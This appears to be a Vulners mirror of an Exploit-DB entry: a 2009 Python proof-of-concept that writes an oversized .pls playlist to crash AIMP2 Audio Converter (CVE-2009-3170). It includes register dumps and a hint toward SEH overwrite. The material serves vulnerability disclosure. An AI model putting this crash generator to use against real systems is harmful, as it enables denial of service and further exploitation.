Lucene search
+L

AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)

🗓️ 01 Sep 2009 00:00:00Reported by mr_meType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

AIMP2 Audio Converter Unicode Crash Po

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
21 Nov 200900:00
zdt
circl
Circl
CVE-2009-3170
1 Sep 200900:00
circl
cve
CVE
CVE-2009-3170
11 Sep 200920:00
cve
cvelist
Cvelist
CVE-2009-3170
11 Sep 200920:00
cvelist
exploitdb
Exploit DB
AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow
21 Nov 200900:00
exploitdb
exploitdb
Exploit DB
AIMP2 Audio Converter - Playlist Overflow (SEH)
16 Nov 200900:00
exploitdb
euvd
EUVD
EUVD-2009-3153
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3170
11 Sep 200920:30
nvd
openvas
OpenVAS
AIMP ID3 Tag Buffer Overflow Vulnerability
7 Jul 200900:00
openvas
prion
Prion
Stack overflow
11 Sep 200920:30
prion
Rows per page
#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
#
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#

header = ("[playlist]\nNumberOfEntries=3\n\n");
header += ("File1=");
crash = ("\x41" * 5000);

buffer = header + crash
file=open('mr_mes_funky.pls','w')
file.write(buffer)
file.close()
print "[+] mr_mes_funky.pls file created successfully"

# milw0rm.com [2009-09-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.15351
33